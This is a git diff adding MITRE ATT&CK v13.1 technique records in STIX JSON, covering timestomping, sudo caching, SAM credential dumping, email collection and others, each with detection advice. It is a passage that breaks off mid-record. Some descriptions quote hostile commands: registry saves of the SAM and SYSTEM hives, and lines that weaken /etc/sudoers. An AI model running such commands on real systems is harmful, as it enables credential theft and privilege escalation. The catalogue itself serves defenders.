"3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a.json new file mode 100644 index 0000000000000000000000000000000000000000..ae5d484cae29ad7b73b7d3086e282d1174f76792 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a.json @@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--090f2033-eb68-4dbd-a357-7aae22dac030", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Romain Dumont, ESET" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a", + "type": "attack-pattern", + "created": "2017-05-31T21:31:12.675Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1099", + "url": "https://attack.mitre.org/techniques/T1099" + }, + { + "url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html", + "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.", + "source_name": "WindowsIR Anti-Forensic Techniques" + } + ], + "modified": "2020-02-18T16:56:57.039Z", + "name": "Timestomp", + "description": "Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc.json new file mode 100644 index 0000000000000000000000000000000000000000..125ac186aa27f64522aebb76e7e9048774df4527 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--fab4f989-3b6d-4e0b-b6b5-92f93c846624", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "type": "attack-pattern", + "created": "2021-03-17T15:28:10.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1016.001", + "url": "https://attack.mitre.org/techniques/T1016/001" + } + ], + "modified": "2021-03-25T17:03:26.632Z", + "name": "Internet Connection Discovery", + "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0.json new file mode 100644 index 0000000000000000000000000000000000000000..f990b44cf02f03eb6ea8879df86f9ed9638078d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0.json @@ -0,0 +1,74 @@ +{ + "type": "bundle", + "id": "bundle--2845ee47-fb1f-4d62-9f69-e14e952bd619", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "type": "attack-pattern", + "created": "2020-01-30T14:34:44.992Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1548.003", + "url": "https://attack.mitre.org/techniques/T1548/003" + }, + { + "url": "https://www.sudo.ws/", + "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", + "source_name": "sudo man page 2018" + }, + { + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "source_name": "OSX.Dok Malware" + }, + { + "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does", + "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", + "source_name": "cybereason osx proton" + } + ], + "modified": "2022-03-14T16:28:19.781Z", + "name": "Sudo and Sudo Caching", + "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Metadata", + "File: File Modification", + "Process: Process Creation" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_effective_permissions": [ + "root" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b.json new file mode 100644 index 0000000000000000000000000000000000000000..32f7650a72a62d344f2d073770cb22cf3c7c7d9c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--a5df32b0-7411-46a9-af1f-5f6a2c42fc56", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "type": "attack-pattern", + "created": "2020-02-20T21:09:55.995Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1560.003", + "url": "https://attack.mitre.org/techniques/T1560/003" + }, + { + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "source_name": "ESET Sednit Part 2" + } + ], + "modified": "2020-03-25T22:48:14.605Z", + "name": "Archive via Custom Method", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Creation", + "Script: Script Execution" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--144e007b-e638-431d-a894-45d90c54ab90.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--144e007b-e638-431d-a894-45d90c54ab90.json new file mode 100644 index 0000000000000000000000000000000000000000..993da4c6c55dd63668c5aad820862f1274181475 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--144e007b-e638-431d-a894-45d90c54ab90.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--e5c601cd-5bc8-4937-a6e2-40fe86b3cc21", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "type": "attack-pattern", + "created": "2019-08-30T18:03:05.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1578", + "url": "https://attack.mitre.org/techniques/T1578" + }, + { + "source_name": "Mandiant M-Trends 2020", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020." + } + ], + "modified": "2021-04-20T14:51:01.759Z", + "name": "Modify Cloud Compute Infrastructure", + "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Instance: Instance Start", + "Instance: Instance Stop", + "Instance: Instance Modification", + "Volume: Volume Metadata", + "Snapshot: Snapshot Creation", + "Instance: Instance Creation", + "Snapshot: Snapshot Deletion", + "Snapshot: Snapshot Metadata", + "Instance: Instance Metadata", + "Volume: Volume Modification", + "Snapshot: Snapshot Modification", + "Volume: Volume Creation", + "Volume: Volume Deletion", + "Instance: Instance Deletion" + ], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce.json new file mode 100644 index 0000000000000000000000000000000000000000..45d0907d9d574e048f04da7f8e169d8a32ff5be7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--b7fab7f6-15e5-4699-ba77-15ea34b43fff", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-15T17:26:53.365Z", + "name": "Permission Groups Discovery", + "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_contributors": [ + "Daniel Prizmant, Palo Alto Networks", + "Yuval Avrahami, Palo Alto Networks", + "Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers" + ], + "x_mitre_version": "2.5", + "x_mitre_data_sources": [ + "Group: Group Enumeration", + "Command: Command Execution", + "Process: Process Creation", + "Group: Group Metadata", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "created": "2017-05-31T21:30:55.471Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1069", + "external_id": "T1069" + }, + { + "source_name": "K8s Authorization Overview", + "description": "Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.", + "url": "https://kubernetes.io/docs/reference/access-authn-authz/authorization/" + }, + { + "source_name": "CrowdStrike BloodHound April 2018", + "description": "Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.", + "url": "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f.json new file mode 100644 index 0000000000000000000000000000000000000000..5af80a0fc9f0577d7f5ded1ee10eb46f2dbe59e5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f.json @@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--33a3b535-89fc-4278-a7f1-f0418b5292cb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T20:46:04.871Z", + "name": "Email Collection", + "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_contributors": [ + "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Google Workspace", + "macOS", + "Linux" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [ + "File: File Access", + "Logon Session: Logon Session Creation", + "Application Log: Application Log Content", + "Command: Command Execution", + "Network Traffic: Network Connection Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "created": "2017-05-31T21:31:25.454Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1114", + "external_id": "T1114" + }, + { + "source_name": "Microsoft Tim McMichael Exchange Mail Forwarding 2", + "description": "McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.", + "url": "https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011.json new file mode 100644 index 0000000000000000000000000000000000000000..40b02f94c487f136e91cc0dba7195fcf826a2691 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--0d1113c8-1ffe-4b2a-bf1f-585eb5a9992f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Ed Williams, Trustwave, SpiderLabs" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", + "created": "2020-02-11T18:42:07.281Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1003.002", + "url": "https://attack.mitre.org/techniques/T1003/002" + }, + { + "source_name": "GitHub Creddump7", + "url": "https://github.com/Neohapsis/creddump7", + "description": "Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)\n\nNotes: \n\n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n", + "modified": "2022-06-15T16:17:19.049Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Security Account Manager", + "x_mitre_detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_data_sources": [ + "File: File Access", + "Command: Command Execution", + "Windows Registry: Windows Registry Key Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f.json new file mode 100644 index 0000000000000000000000000000000000000000..739f866a15b9673f46895824a5b51a775138183a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--60ff411b-a151-4f4a-8712-f82df14924a6", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", + "type": "attack-pattern", + "created": "2020-10-02T16:56:49.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1596.002", + "url": "https://attack.mitre.org/techniques/T1596/002" + }, + { + "source_name": "WHOIS", + "url": "https://www.whois.net/", + "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020." + } + ], + "modified": "2021-04-15T03:50:44.113Z", + "name": "WHOIS", + "description": "Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada.json new file mode 100644 index 0000000000000000000000000000000000000000..82d4a45c908c35c547d69209feb92811b992cbf4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada.json @@ -0,0 +1,104 @@ +{ + "type": "bundle", + "id": "bundle--91f97fd6-b3d7-4e80-81fa-1fc5e1f81f82", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:49.493Z", + "name": "System Firmware", + "description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist 